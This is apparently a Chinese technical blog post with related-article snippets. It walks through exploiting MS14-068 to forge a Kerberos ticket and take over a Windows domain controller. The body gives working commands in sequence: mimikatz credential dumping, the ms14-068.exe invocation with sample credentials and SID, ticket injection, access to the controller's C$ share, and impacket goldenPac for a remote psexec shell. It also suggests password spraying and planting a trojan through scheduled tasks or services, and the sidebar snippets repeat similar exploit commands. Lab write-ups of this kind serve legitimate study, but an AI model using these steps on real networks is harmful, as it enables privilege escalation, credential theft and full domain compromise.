MS14-068域渗透

于 2024-03-10 21:41:05 发布
阅读量426 收藏 5
点赞数 11
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bailandawang123/article/details/136609783
版权

原理:

ms14068主要是通过伪造域管的tgt,将普通用户提升为域管用户,从而控制域控。

信息准备

如果内存中有域管的tgt,直接导出域管的tgt来进行利用。
如果没有域管的tgt,利用ms14068进行伪造域管的tgt来利用,利用成功的话拿下域管的tgt,全部信息导出,完成通杀。只要服务器没有打ms14068这个补丁,在serve的域控服务器上,都可以进行利用。

利用条件

1 获取域普通账户的账号密码 如果没有的话,可以采用密码喷洒攻击爆破一下
2 获得普通用户的isd
3 服务器未打补丁KB3011780

实验方式:

1 首先先获取到普通用户的sid号

whoami /all
查找到当前,sid值

2 查找密码 方式包括密码喷洒,mimikatz

sekurlsa::logonPasswords
包括在线lsass,sam密码抓取,
https://www.yuque.com/u22130424666/aac20c/hrcslalnzw2kgr3w
还有读取ntlm哈希,然后使用hashcat进行破解。
还有密码破解

3 查看补丁,观察是否存在KB3011780补丁,如果不存在这个补丁的话直接全部通杀
4 使用mimikatz查票
一般情况下,我们拿下域管权限之后便,我们需要查票,查一些白银票据或者黄金票据。看有没有存下的权限维持的工具
image.png
票据相当于一个文件,一般拿到票据之后
如果有其他票据之后,我们可以直接连接
5 上传ms14068

ms14-068.exe -u 域用户@域名 -p 域用户密码 -s 域用户SID -d 域控
ms14-068.exe -u Administrator@god.org -p AAaa1234 -s S-1-5-21-2952760202-1353902439-2381784089-500 -d 192.168.52.141

直接利用这个工具,拿到票据,生成之后的票据在桌面上
6 导入票据

kerberos::ptc 票据名字

7 拥有票据之后

dir \\dc2.test.com\c$ 注意是机器名不是IP

8 建立网络连接

net use \\机器名

9 复制木马文件,执行计划表或者服务表来进行上线木马

golden.pac

此工具是impacket工具包里的,它是MS14-068+psexec的组合,因此使用起来非常放方便快捷


goldenPac.exe 域名/域用户名:域用户明文密码@域控完整域名

通过这个漏洞直接获得psexec的shell

bailandawang123
关注
  • 11
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
内提权之MS14-068
good good study
03-17 4680
目标:普通成员——>管理员 漏洞利用前提 控没有打MS14-068的补丁(KB3011780) 拿下一台加入的计算机 有这台内计算机的用户密码和Sid 漏洞复现 环境: win2012(192.168.10.2) 控,开启了防火墙 win7(192.168.10.5),成员 1. win7获取账户的密码及sid值 win7机器上查看管理员,可发现,并没有自己 这里使用mimikatz去抓取用户的明文密码 mimikatz.exe "privilege:....
kerberos-MS14-068(kerberos用户提权)
Ms08067安全实验室
11-20 227
点击星标,即时接收最新推文微软官方在2014年11月18日发布了一个紧急补丁,Windows全版本服务器系统受到影响,包括Windows Server 2003,Windows Server 2008,Windows Server 2008 R2,Windows Server 2012和Windows Server 2012 R2,修复了Microsoft Windows Kerberos KDC...
复现MS14-068
这里是Y.lin的博客,目前是一名网络安全专业的学生,希望和师傅们一起进步吧!
05-23 530
MS14-068
MS14-068AD提权神器
05-24
本地WINDOWS: 1.python.exe ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.local user-a-1@dom-a.loc位用户 S-1-5-21-557603841-771695929-1514560438-1103 为账号SID dc-a-2003.dom-a.local这机全名 可以通过:1)wmic useraccount where name=”USERNAME” get sid 2)whoami /all 本机可以直接查出自己的SID; 用法国神器破解,需要时最新版本的才支持, 2.mimikatz.exe log "kerberos::ptc TGT_user-a-1@dom-a.loc.ccache" exit TGT_user-a-1@dom-a.loc.ccache指的是第一步所生成的ccache文件。 3. kerberos::ptc TGT_secpulse@secpulse.local.ccache 4.查看: klist net use \\DC2.secpulse.local\admin$ //注:使用IP可能会失败 dir \\DC2.secpulse.local\c$ 看看有木有权限 好运~
MS14_068利用
weixin_45682070的博客
05-25 486
假设已经获得TargetShell,并且在环境中并未打ms14_068的相关补丁 接下来我们进行利用 通过上篇文章的信息搜集(https://blog.csdn.net/weixin_45682070/article/details/106337762) 首先GitHub上下载ms14_068的利用脚本pykek python ms14-068.py -u whale@DC.com -s S-1-5-21-2867916317-3317112163-957300651-1113 -d 192.168.17
MS14-068提权
weixin_30402343的博客
06-18 239
Ms14-068 • 库 • https://github.com/bidord/pykek • ms14-068.py -u user@lab.com -s userSID -d dc.lab.com • 拷贝 TGT_user1@lab.com.ccache 到windows系统 • 本地管理员登陆 • mimikatz...
ms14-068.exe内神器
11-25
ms14-068.exe内神器
渗透完全技巧.pdf
10-03
1.无凭证情况下 ...MS14-068 Kerberos SPN扫描 Kerberos的黄金门票 Kerberos的银票务 服务账号破解 凭证盗窃 NTLM relay Kerberos委派 地址解析协议 zerologon漏洞 CVE-2021-42278 && CVE-2021-42287
内网渗透渗透.pdf
08-07
目录 工作组& 渗透姿势 MS14-068 致谢
渗透工具包
01-15
【标题】:“渗透工具包”是指一组专门用于在Windows操作系统环境下进行权限提升和攻击的工具,主要包括mimikatz、psexec以及ms14-068漏洞利用工具。 【描述】:在网络安全渗透是攻击者试图获取对...
ms14-068利用工具包.zip
07-01
包含了minikatazx64位,以及MS14-068.exe和ms14-068.exe。工具可以放心使用。无后门,如果需要免杀可以自行混淆加壳
[提权]内提权神器 MS14-068 完整EXP
weixin_30359021的博客
04-12 618
可以让任何内用户提升为管理员 c:\python27\python.exe ms14-068.py -u k8test3@k8.local -p k8team!@# -s S-1-5-21-4191298166-3247023184-3514116461-1110 -d K8DNS.k8.localmimikatz.exe "kerberos::ptc TGT_k8test3@...
MS14-068 (CVE-2014-6324)用户提权漏洞
做自己喜欢的事,并将其发挥到极致!
03-15 7272
文章目录声明一、漏洞简介二、漏洞原理三、实验环境四、漏洞利用利用思路前提条件方法一方法二方法三方法四五、参考文章 声明 本篇文章仅用于技术研究,切勿用于非法用途,仅供参考! 一、漏洞简介 远程权限提升漏洞存在于 Microsoft Windows 的 Kerberos KDC 实现中。存在该漏洞的情况为无法正确验证签名,这可能造成 Kerberos 服务票证的某些方面被人伪造。简单来说就是一个内的普通账户可以利用此漏洞进行权限提升,升级为管理员权限。 二、漏洞原理 Kerberos认证原理:http
MS14-068漏洞提权学习(实战)&& 控服务器搭建 && 远程权限提升 && 查看控中的sid
永不垂头的博客
08-29 426
MS14-068漏洞提权学习(实战)&& 控服务器搭建 && 远程权限提升 && 查看控中的sid 文章目录MS14-068漏洞提权学习(实战)&& 控服务器搭建 && 远程权限提升 && 查看控中的sid前言一、MS14-068漏洞提权学习二、MS14-068漏洞提权实战三、控服务器搭建四、远程权限提升五、查看控中的sid六、我的公众号 前言 一、MS14-068漏洞提权学习 安装dcpro
MS14-068提权和impacket工具包提权
Unknowncheats的博客
02-07 264
ms14-068提权工具利用a)拿下边界机win7,并已经有win7上任意一个账号的密码-u 用户名@-p 用户密码-s 用户sid-d ms14-068.exe -u test3@superman.com -p Test#123 -s S-1-5-21-2030659959-700672918-1434258406-1113 -d win08.superman.com生成一个ccache后缀票据导入票据导入之前,清空票据缓存kerberos::purge kerberos::ptc 票据使...
MS14-068 漏洞复现
box
03-24 889
0x00 漏洞成因 MS14-068 是密钥分发中心(KDC)服务中的Windows漏洞。它允许经过身份验证的用户在其Kerberos票证(TGT)中插入任意PAC(表示所有用户权限的结构)。该漏洞位于kdcsvc.dll控制器的密钥分发中心(KDC)中。用户可以通过呈现具有改变的PAC的Kerberos TGT来获得票证 简单来说就是: windows中使用kerberos协议过程中,为了让SS服务器判断Client是否有权限访问服务,引入了PAC机制。构造PAC也是这个漏洞的根本。 在请求AS时,
ms14-068漏洞获取控管理员密码
weixin_34268610的博客
03-04 366
工具下载地址:https://github.com/bidord/pykek/ root@kali:~/sploit/pykek# python ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc Password:    [+] Build...
MS14-068漏洞复现
2ed
11-18 1363
背景 微软今天(2014-11-18)发布了一个紧急补丁,修复了一个影响全部版本Windows服务器的严重漏洞。今天发布的MS14-068漏洞补丁用于解决Microsoft WindowsKerberosKDC漏洞(CVE-2014-6324),该漏洞允许黑客提升任意普通用户权限成为管理员(Domain Admin)身份。也就是说,你在一台普通用户的机器上利用这个漏洞,那么这个用户就变...
内网渗透(四十)之横向移动篇-ms14-068传递获取管横向移动
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-18 709
ms14-068漏洞主要通过伪造管的TGT,将普通用户权限提权为管权限,以此来控制控。只要服务器未打ms14-068补丁(KB3011780),在server 2000以上的控服务器中,都可进行利用这里就涉及到了我们之前所讲的PAC这个东西了,我们在关于 Kerberos 认证流程的介绍中提到了 PAC(Privilege Attribute Certificate)这个东西,这是微软为了访问控制而引进的一个扩展,即特权访问证书。
ms14-068下载
最新发布
12-04
ms14-068是微软公司发布的一个安全更新程序,用于修复Windows操作系统中一个重要的安全漏洞。这个漏洞存在于Windows控制器中,攻击者可以利用它在网络中执行特权提升攻击,从而获取对系统的完全控制。因此,微软...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值